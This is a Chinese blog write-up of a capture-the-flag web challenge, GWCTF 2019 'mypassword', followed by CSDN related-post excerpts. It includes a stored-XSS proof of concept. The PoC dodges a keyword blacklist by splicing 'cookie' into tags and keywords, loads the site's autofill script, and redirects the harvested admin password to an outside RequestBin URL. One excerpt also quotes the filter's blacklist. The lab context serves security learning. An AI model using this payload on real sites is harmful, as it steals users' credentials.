【代码审计】buu_[GWCTF 2019]mypassword

最新推荐文章于 2023-03-01 19:50:14 发布
最新推荐文章于 2023-03-01 19:50:14 发布
阅读量556 收藏
点赞数 1
分类专栏: CTF_代码审计 文章标签: javascript 前端 html
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/serendipity1130/article/details/125200361
版权

1.页面打开像是注入,现注册登录后发现并非注入,如下:

2.在登陆界面发现./js/login.js,打开查看到如下的js代码:

if (document.cookie && document.cookie != '') { //Cookie是一个由该域名下的所有cookie的值对所组成的字符串,值对间以“分号加空格”分隔
	var cookies = document.cookie.split('; '); //为了方便查看,可以使用split()方法将cookie中的值对解析出来,得到一个cookie的列表
	var cookie = {};
	for (var i = 0; i < cookies.length; i++) {
		var arr = cookies[i].split('=');  // 解析出值
		var key = arr[0];
		cookie[key] = arr[1];
	}
	if(typeof(cookie['user']) != "undefined" && typeof(cookie['psw']) != "undefined"){
		document.getElementsByName("username")[0].value = cookie['user'];  
		document.getElementsByName("password")[0].value = cookie['psw']; //返回页面中标签名属性为name的对象
	}
}

代码解读:代码会把cookie中的username和password填进当前表单

思路:由于是后端执行js,所以构造js即可。先写一个有表单的页面,调用这个js文件,cookie中的数据被填入表单,再用js获取页面表单内容,发送请求,就能得到管理员cookie。现在看在哪里以及如何发送请求。

3.由于在各页面查看源码,在首页发现feedback.php:

打开其源码可看到注释:

代码分析:对feedback输入的内进行过滤,即把feedback中在黑名单中的字符串替换为空,只是替换为空很容易绕过

方法:根据上述login.js可将密码填入表单的功能,所以构造一个表单在feedback页面提交。

在 http://http.requestbin.buuoj.cn(RequestBin提供了一个URL,该URL将收集对其发出的请求,首页点击create a requestbin)页面接收flag

4.大神的poc:

<incookieput type="text" name="username">
<incookieput type="password" name="password">
<scrcookieipt scookierc="./js/login.js"></scrcookieipt>
<scrcookieipt>
    var psw = docucookiement.getcookieElementsByName("password")[0].value;
    docucookiement.locacookietion="http://http.requestbin.buuoj.cn/rlrk8drl/?a="+psw;
</scrcookieipt>

 5.退回原界面即可获取flag 

malloc_冲!
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
[BUUCTF][GWCTF 2019]mypassword
m0_52587327的博客
04-26 291
文章目录知识点解题过程学习参考 知识点 csrf requestbin使用(外带数据,即命令注入无回显时如何得到执行结果) 解题过程 注册登录 这里加载了一个js文件 payload: 60d487b4-04d2-4e33-9aad-fbe0264c5ac6.node3.buuoj.cn**/js/login.js** 得到一串js代码 if (document.cookie && document.cookie != '') { var cookies = document.coo
POSN:POSN-BUU的源代码
04-01
POSN POSN-BUU的源代码
Buuctf刷题记录
weixin_51706044的博客
09-29 711
[HCTF 2018]WarmUp 这是一道关于代码审计的题通过查看源代码发现了source.php的源文件进入查看 ` <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"]; .
BUUCTF 之 代码审计知识点总结
qq_49833809的博客
11-13 1160
代码审计知识点总结
Buuctf-warmup【代码审计
qq_61968245的博客
12-15 1043
0x01 题目链接 https://buuoj.cn/challenges#[HCTF%202018]WarmUphttps://buuoj.cn/challenges#[HCTF%202018]WarmUp 0x02 知识点 isset($name):判断变量是否存在 is_string($name):判断变量是否为字符串 in_array($search,$array):判$search是否在$array数组里 mb_stro...
BugkuCTF之代码审计题部分(未完待续。。。。)
A_dmin的博客
12-17 878
BugkuCTF之代码审计题部分 第一题: 分析代码: 首先确定extract()函数的用法,以及参数: 理解了extract()函数就好写了。 直接 ?shiyan=&amp;amp;amp;falg= 第二题: 这个也是strcmp()函数的绕过,参数传入一个a数组 ?a[]=12 第三题: 看代码,应该是让我们传入一个id=hackerDJ使之获取flag 不过又需要我们urldecode...
WEB_HCTF_2018_WarmUp
Pz_mstr's Blog
03-06 624
Categories web-代码审计 write up source code get source code http://eb22847d-9f8a-4ecf-b972-5ecebfcf5faf.node3.buuoj.cn/source.php <?php highlight_file(__FILE__); class emmm { publi...
BUU 论坛的编辑器163Editor
09-21
BUU 论坛的编辑器DianUbb.rar
cipher_CIPHER_
09-29
this is document for Hi3520D
Majin Buu Top HD Anime New Tabs Theme-crx插件
03-15
每次打开一个新选项卡,您将获得Majin Buu提供的不同高清壁纸 这个新主题包括时钟等等。 魔鬼的布欧(the devil,Buu),日本动漫《七龙珠》中的义与恶的角色,是《七龙珠》综合实力最强的BOSS。 这个名字来自电影...
thuong_mai_dien_tu_magento
03-05
Docker Magento 2.4.X开源(CE)02-2021 用于Magento 2.4.x开发的Docker容器,包括: ... 阿帕奇2.4 MYSQL 8 清漆6 FPC 兔子MQ PhpMyAdmin 记忆快取 弹性搜寻7.x REDIS会话,系统,FPC ... 编辑.env-添加您的...
[GWCTF 2019]mypassword
shinygod的博客
09-18 470
知识点:xss
BUUCTF--[GWCTF 2019]mypassword
qq_46263951的博客
07-26 662
<!-- if(is_array($feedback)){ echo "<script>alert('反馈不合法');</script>"; return false; } $blacklist = ['_','\'','&','\\','#','%','input','script','iframe','host','onlo...
buu刷题(第一周)
qq_62046696的博客
03-01 762
create_function直接执行,里面是有eval所以需要让create_function的函数名()引用一下来执行,下面的是不可能爆破成功了,然后create_function()这个函数的漏洞,他create之后会自动生成一个函数名为%00lambda_[0-999]我们可以爆破。
[GWCTF 2019]mypassword-做题记录
cjdgg的博客
03-13 398
[GWCTF 2019]mypassword-做题思路学习 这题给了个朴实无华的登陆界面,有注册登录界面那肯定得试试sql注入,很遗憾没有试出来。 那就找找源代码看看有没有有价值的东西 只发现加载了一个login.gs,emem还是没发现有什么能用的,没办法那就注册一个号登录进去看看吧 登录进去主页面会有你的用户名可控,我就想会不会有啥ssti或者搞些标签进去,结果可想而知,<,>,{,},’,"这些符号应该被过滤了,那这题就不是这么玩的 去看看别的页面,feedback.php这里应
[GWCTF 2019]mypassword XSS
qq_54929891的博客
06-22 393
放假
buu crackrtf
最新发布
09-26
BUU CrackRTF是一个密码破解题目,其中涉及到了密码的加密和解密过程。在分析代码的过程中,我们可以看到有两个函数sub_40100F和sub_401005。sub_40100F函数是从AAA文件中取出字符和密码进行异或操作,而sub_401005函数则是对数据进行异或操作并生成了一个RTF文件。 根据代码分析,我们可以得到以下步骤来破解这个密码: 1. 首先,我们需要找到AAA文件中的数据和密码进行异或操作。 2. 我们可以使用ResourceHacker这个工具来查看AAA文件中的资源,并获取需要异或的数据。 3. 将获取到的数据和输入的密码进行异或操作,得到解密后的字符串。 请注意,以上步骤仅仅是对代码进行分析后的一种破解思路,具体操作还需要根据实际情况进行调整。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值